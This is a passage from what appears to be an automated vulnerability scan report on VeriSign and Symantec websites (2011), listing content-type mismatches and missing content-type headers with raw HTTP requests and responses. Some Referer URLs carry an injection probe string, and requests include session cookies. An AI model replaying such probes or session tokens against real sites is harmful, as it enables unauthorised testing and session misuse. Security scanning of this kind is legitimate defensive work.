TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Length: 985 Content-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
23.61. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Length: 4102 Content-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
23.62. http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.verisign.com
Path:
/stellent/groups/public/documents/image/dev041741.jpg
Issue detail
The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.
Request
GET /stellent/groups/public/documents/image/dev041741.jpg HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:46 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:34:54 GMT Accept-Ranges: bytes Content-Length: 3231 Expires: Sun, 09 Oct 2011 21:59:46 GMT Content-Type: image/jpeg GIF89a..9.....dz.Ki.e|.....7........".r............D....z........Hd....../22....Ti......iii.)Q...............}}}.....A........+...aaa.....JKK...XXX.$..*J.......q.................Rr........).......f{....[SNIP]...
23.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
Summary
Severity:
Information
Confidence:
Firm
Host:
https://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.custom.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 985 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
23.64. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
Summary
Severity:
Information
Confidence:
Firm
Host:
https://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 4102 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
24. Content type is not specified
There are 19 instances of this issue:
Issue description
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
24.1. https://fileconnect.symantec.com/javascript/calendar2.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/calendar2.js
Request
GET /javascript/calendar2.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:54 GMT Content-length: 6722 Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes // Title: Tigra Calendar // Description: See the demo at url // URL: http://www.softcomplex.com/products/tigra_calendar/ // Version: 3.1 (American date format) // Date: 08-08-2002 (mm-dd-yyyy) //...[SNIP]...
24.2. https://fileconnect.symantec.com/javascript/s_code.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/s_code.js
Request
GET /javascript/s_code.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:54 GMT Content-length: 15081 Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes /* SiteCatalyst code version: H.14. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /* Specify the Report Suite ID(s) to track here */ //s_account="devsymantec...[SNIP]...
24.3. https://fileconnect.symantec.com/javascript/validations.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/validations.js
Request
GET /javascript/validations.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:54 GMT Content-length: 10399 Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes var dtCh= "/"; function trim(strText) { // this will get rid of leading spaces while (strText.substring(0,1) == ' ') strText = strText.substring(1, strText.length); // th...[SNIP]...
24.4. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
Summary
Severity:
Information
Confidence:
Certain
Host:
https://forms.verisign.com
Path:
/websurveys/servlet/ActionMultiplexer
Request
GET /websurveys/servlet/ActionMultiplexer HTTP/1.1 Host: forms.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 36 Date: Fri, 09 Sep 2011 21:41:07 GMT Missing or unknown action ID: null
24.5. http://l.player.ooyala.com/verify
Summary
Severity:
Information
Confidence:
Certain
Host:
http://l.player.ooyala.com
Path:
/verify
Request
POST /verify?ts=1315621578937 HTTP/1.1 Host: l.player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf Content-Length: 1 Origin: http://www.verisign.ch x-verify: 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&sig=0WnlcCNiv6U713lWFHQF User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 content-type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819 r
Response
HTTP/1.1 200 OK Server: nginx/0.7.61 Date: Fri, 09 Sep 2011 21:26:11 GMT Content-Length: 2 Connection: close Expires: Fri, 09 Sep 2011 21:26:10 GMT Cache-Control: no-cache OK
24.6. https://renewals.symantec.com/renewals/js/InstantInvite3.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/InstantInvite3.js
Request
GET /renewals/js/InstantInvite3.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 34318 Last-Modified: Thu, 18 Mar 2010 01:42:34 GMT Accept-Ranges: bytes /* Copyright (C) InstantService, Inc. All rights reserved. * All content is protected under U.S. copyright laws. Any unauthorized duplication, modification, * or reverse-engineering of this code with...[SNIP]...
24.7. https://renewals.symantec.com/renewals/js/commonFunctions.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/commonFunctions.js
Request
GET /renewals/js/commonFunctions.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 5510 Last-Modified: Thu, 18 Mar 2010 01:42:34 GMT Accept-Ranges: bytes // $Id: commonFunctions.js 82 2008-01-30 00:07:20Z mhallesy $ /////////////////////////////////////////// //commonFunctions.js //maintained by stuller //last updated 1/18/2006 //see Confluence fo...[SNIP]...
24.8. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/commonValidation2-9-06.js
Request
GET /renewals/js/commonValidation2-9-06.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 32366 Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT Accept-Ranges: bytes // $Id: commonValidation2-9-06.js 82 2008-01-30 00:07:20Z mhallesy $ //please do not make changes to this file! //if you need to modify it, please make a copy, since this script is used by multipl...[SNIP]...
24.9. https://renewals.symantec.com/renewals/js/dhtmlwindow.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/dhtmlwindow.js
Request
GET /renewals/js/dhtmlwindow.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:34 GMT Content-Length: 19028 Last-Modified: Wed, 02 Jun 2010 23:07:30 GMT Accept-Ranges: bytes // ------------------------------------------------------------------- // DHTML Window Widget- By Dynamic Drive, available at: http://www.dynamicdrive.com // v1.0: Script created Feb 15th, 07' // v...[SNIP]...
24.10. https://renewals.symantec.com/renewals/js/getPageNames.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/getPageNames.js
Request
GET /renewals/js/getPageNames.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 3087 Last-Modified: Wed, 12 May 2010 17:24:52 GMT Accept-Ranges: bytes // $Id: getPageNames.js 1694 2009-04-09 01:56:00Z mhallesy $ function pageNamesLookup(chanName) { this.stSrch = "/renewals/"; this.nameLookup = new Array(); this.nameLookup["chat_form.jsp"]...[SNIP]...
24.11. https://renewals.symantec.com/renewals/js/modal.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/modal.js
Request
GET /renewals/js/modal.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:35 GMT Content-Length: 3362 Last-Modified: Thu, 20 May 2010 22:54:24 GMT Accept-Ranges: bytes // ------------------------------------------------------------------- // DHTML Modal window- By Dynamic Drive, available at: http://www.dynamicdrive.com // v1.0: Script created Feb 27th, 07' // v1...[SNIP]...
24.12. https://renewals.symantec.com/renewals/js/mySymantecDevKit.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/mySymantecDevKit.js
Request
GET /renewals/js/mySymantecDevKit.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
